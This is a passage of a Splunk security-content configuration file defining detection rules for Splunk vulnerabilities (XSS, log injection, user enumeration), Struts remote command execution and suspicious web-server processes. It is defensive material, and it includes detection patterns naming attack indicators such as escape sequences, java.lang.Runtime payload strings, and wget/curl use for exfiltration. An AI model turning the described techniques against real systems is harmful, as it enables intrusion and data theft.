Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43569"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_webx` uri=/en-US/splunkd/__raw/servicesNS/*/launcher/datamodel/model* uri_query!=null | stats count by _time host status clientip user uri | `splunk_stored_xss_via_data_model_objectname_field_filter` [ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule] action.escu = 0 action.escu.enabled = 1 description = An attacker can use a specially crafted web URL in their browser to cause log file injection, in which the attack inserts American National Standards Institute (ANSI) escape codes into specific files using a terminal program that supports those escape codes. The attack requires a terminal program that supports the translation of ANSI escape codes and requires additional user interaction to successfully execute. This following analytic detects potential log injection attempts into the Splunk server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = An attacker can use a specially crafted web URL in their browser to cause log file injection, in which the attack inserts American National Standards Institute (ANSI) escape codes into specific files using a terminal program that supports those escape codes. The attack requires a terminal program that supports the translation of ANSI escape codes and requires additional user interaction to successfully execute. This following analytic detects potential log injection attempts into the Splunk server. action.escu.how_to_implement = This only affects web enabled Splunk instances. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This hunting search will produce false positives if ANSI escape characters are included in URLs either voluntarily or by accident. This search will not detect obfuscated ANSI characters. action.escu.creation_date = 2023-07-13 action.escu.modification_date = 2023-07-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "cve": ["CVE-2023-32712"], "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_webx` uri_path IN ("*\x1B*", "*\u001b*", "*\033*", "*\0x9*", "*\0x8*") | stats count by uri_path method host status clientip | `splunk_unauthenticated_log_injection_web_service_log_filter` [ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads. action.escu.how_to_implement = Requires access to internal splunkd_access. action.escu.known_false_positives = This is a hunting search, the search provides information on upload, edit, and delete activity on Lookup Tables. Manual investigation is necessary after executing search. This search will produce false positives as payload cannot be directly discerned. action.escu.creation_date = 2023-02-14 action.escu.modification_date = 2023-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Potential lookup template injection attempt from $user$ on lookup table at path $uri_path$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22937"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads. action.notable.param.rule_title = Splunk unnecessary file extensions allowed by lookup table uploads action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` method IN ("POST", "DELETE") uri_path=/servicesNS/*/ui/views/* | eval activity = case( method=="POST" AND like( uri_path , "%/acl" ) , "Permissions Update", method=="POST" AND NOT like( uri_path , "%/acl" ) , "Edited" , method=="DELETE" , "Deleted" ) | rex field=uri_path "(?.*?)\/ui\/views/(?.*)" | eval dashboard = urldecode( dashboard_encoded ) | table _time, uri_path, user, dashboard, activity, uri_path | `splunk_unnecessary_file_extensions_allowed_by_lookup_table_uploads_filter` [ESCU - Splunk User Enumeration Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to find password spraying or brute force authorization attempts in addition to someone enumerating usernames. action.escu.known_false_positives = Automation executing authentication attempts against your Splunk infrastructure with outdated credentials may cause false positives. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk User Enumeration Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = $TotalFailedAuths$ failed authentication events to Splunk from $src$ detected. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk User Enumeration Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2021-33845"], "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.notable.param.rule_title = Splunk User Enumeration Attempt action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_failed_auths` | stats count(user) as auths by user, src | where auths>5 | stats values(user) as user, sum(auths) as TotalFailedAuths by src | `splunk_user_enumeration_attempt_filter` [ESCU - Splunk XSS in Highlighted JSON Events - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection provides information about possible exploitation against affected versions of Splunk Enterprise 9.1.2. The ability to view JSON logs in the web GUI may be abused by crafting a specific request, causing the execution of javascript in script tags. This vulnerability can be used to execute javascript to access the API at the permission level of the logged-in user. If user is admin it can be used to create an admin user, giving an attacker broad access to the Splunk Environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection provides information about possible exploitation against affected versions of Splunk Enterprise 9.1.2. The ability to view JSON logs in the web GUI may be abused by crafting a specific request, causing the execution of javascript in script tags. This vulnerability can be used to execute javascript to access the API at the permission level of the logged-in user. If user is admin it can be used to create an admin user, giving an attacker broad access to the Splunk Environment. action.escu.how_to_implement = This search only applies to web-GUI-enabled Splunk instances and operator must have access to internal indexes. action.escu.known_false_positives = This is a hunting search and will produce false positives as it is not possible to view contents of a request payload. It shows the artifact resulting from a potential exploitation payload (the creation of a user with admin privileges). action.escu.creation_date = 2023-11-16 action.escu.modification_date = 2023-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk XSS in Highlighted JSON Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk XSS in Highlighted JSON Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_ui` "/en-US/splunkd/__raw/servicesNS/nobody/search/authentication/users" status=201 | stats count min(_time) as firstTime max(_time) as lastTime by clientip, uri_path, method | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_xss_in_highlighted_json_events_filter` [ESCU - Splunk XSS in Monitoring Console - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection will find attempted exploitation of CVE-2022-27183. action.escu.known_false_positives = Use of the monitoring console where the less-than sign (<) is the first character in the description field. action.escu.creation_date = 2022-04-27 action.escu.modification_date = 2022-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk XSS in Monitoring Console - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = A potential XSS attempt has been detected from $user$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk XSS in Monitoring Console - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-27183"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched version of Splunk. action.notable.param.rule_title = Splunk XSS in Monitoring Console action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_web` method="GET" uri_query="description=%3C*" | table _time host status clientip user uri | `splunk_xss_in_monitoring_console_filter` [ESCU - Splunk XSS in Save table dialog header in search page - Rule] action.escu = 0 action.escu.enabled = 1 description = This is a hunting search to find persistent cross-site scripting XSS code that was included while inputing data in 'Save Table' dialog in Splunk Enterprise (8.1.12,8.2.9,9.0.2). A remote user with "power" Splunk role can store this code that can lead to persistent cross site scripting. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This is a hunting search to find persistent cross-site scripting XSS code that was included while inputing data in 'Save Table' dialog in Splunk Enterprise (8.1.12,8.2.9,9.0.2). A remote user with "power" Splunk role can store this code that can lead to persistent cross site scripting. action.escu.how_to_implement = Watch for POST requests combined with XSS script strings or obfuscation against the injection point /en-US/splunkd/__raw/servicesNS/nobody/search/datamodel/model. action.escu.known_false_positives = If host is vulnerable and XSS script strings are inputted they will show up in search. Not all Post requests are malicious as they will show when users create and save dashboards. This search may produce several results with non malicious POST requests. Only affects Splunk Web enabled instances. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk XSS in Save table dialog header in search page - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk XSS in Save table dialog header in search page - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43561"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_webx` method=POST uri=/en-US/splunkd/__raw/servicesNS/nobody/search/datamodel/model | table _time host status clientip user uri | `splunk_xss_in_save_table_dialog_header_in_search_page_filter` [ESCU - Splunk XSS via View - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. This hunting search shows users action, application and role used for creating views related to this vulnerability. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. This hunting search shows users action, application and role used for creating views related to this vulnerability. action.escu.how_to_implement = This data is collected by default in Splunk. Upon first enabling this rule, a number of errors may be observed. Those that are due to improperly formatted, but non-nefarious, XML views should be be remedied in the corresponding view. Please take care investigating potential XSS as accessing an affected page could retrigger the exploit. action.escu.known_false_positives = The error detected above can be generated for a wide variety of improperly formatted XML views. There will be false positives as the search cannot extract the malicious payload and the view should be manually investigated. action.escu.creation_date = 2023-02-07 action.escu.modification_date = 2023-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk XSS via View - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk XSS via View - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22933"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = index = _internal sourcetype IN ("splunk_web_service", "splunk_python") message="*loadParams*" | `security_content_ctime(_time)` | table _time message fileName | `splunk_xss_via_view_filter` [ESCU - Suspicious Email Attachment Extensions - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects emails that contain attachments with suspicious file extensions. Detecting and responding to emails with suspicious attachments can mitigate the risks associated with phishing and malware attacks, thereby protecting the organization's data and systems from potential harm. The detection is made by using a Splunk query that searches for emails in the datamodel=Email where the filename of the attachment is not empty. The analytic uses the tstats command to summarize the count, first time, and last time of the emails that meet the criteria. It groups the results by the source user, file name, and message ID of the email. The detection is important because it indicates potential phishing or malware delivery attempts in which an attacker attempts to deliver malicious content through email attachments, which can lead to data breaches, malware infections, or unauthorized access to sensitive information. Next steps include reviewing the identified emails and attachments and analyzing the source user, file name, and message ID to determine if they are legitimate or malicious. Additionally, you must inspect any relevant on-disk artifacts associated with the attachments and investigate any concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = ["Email"] action.escu.eli5 = The following analytic detects emails that contain attachments with suspicious file extensions. Detecting and responding to emails with suspicious attachments can mitigate the risks associated with phishing and malware attacks, thereby protecting the organization's data and systems from potential harm. The detection is made by using a Splunk query that searches for emails in the datamodel=Email where the filename of the attachment is not empty. The analytic uses the tstats command to summarize the count, first time, and last time of the emails that meet the criteria. It groups the results by the source user, file name, and message ID of the email. The detection is important because it indicates potential phishing or malware delivery attempts in which an attacker attempts to deliver malicious content through email attachments, which can lead to data breaches, malware infections, or unauthorized access to sensitive information. Next steps include reviewing the identified emails and attachments and analyzing the source user, file name, and message ID to determine if they are legitimate or malicious. Additionally, you must inspect any relevant on-disk artifacts associated with the attachments and investigate any concurrent processes to identify the source of the attack. action.escu.how_to_implement = You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. \ **Splunk Phantom Playbook Integration**\ If Splunk Phantom is also configured in your environment, a Playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox. action.escu.known_false_positives = None identified action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Email Attachment Extensions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious Email Attachment Extensions - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | `suspicious_email_attachments` | `suspicious_email_attachment_extensions_filter` [ESCU - Suspicious Java Classes - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts. action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your web-traffic appliances that serve or sit in the path of your Struts application servers. This can be accomplished by indexing data from a web proxy, or by using network traffic-analysis tools, such as Splunk Stream or Bro. action.escu.known_false_positives = There are no known false positives. action.escu.creation_date = 2018-12-06 action.escu.modification_date = 2018-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Java Classes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Apache Struts Vulnerability"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious Java Classes - Rule action.correlationsearch.annotations = {"analytic_story": ["Apache Struts Vulnerability"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime|processbuilder)" | rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time) as lastTime, values(url) as uri, values(status) as status, values(http_user_agent) as http_user_agent by src, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_java_classes_filter` [ESCU - Web Servers Executing Suspicious Processes - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". Uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". Uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some of these processes may be used legitimately on web servers during maintenance or other administrative tasks. action.escu.creation_date = 2019-04-01 action.escu.modification_date = 2019-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Servers Executing Suspicious Processes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Apache Struts Vulnerability"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Web Servers Executing Suspicious Processes - Rule action.correlationsearch.annotations = {"analytic_story": ["Apache Struts Vulnerability"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". Uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack. action.notable.param.rule_title = Web Servers Executing Suspicious Processes action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where 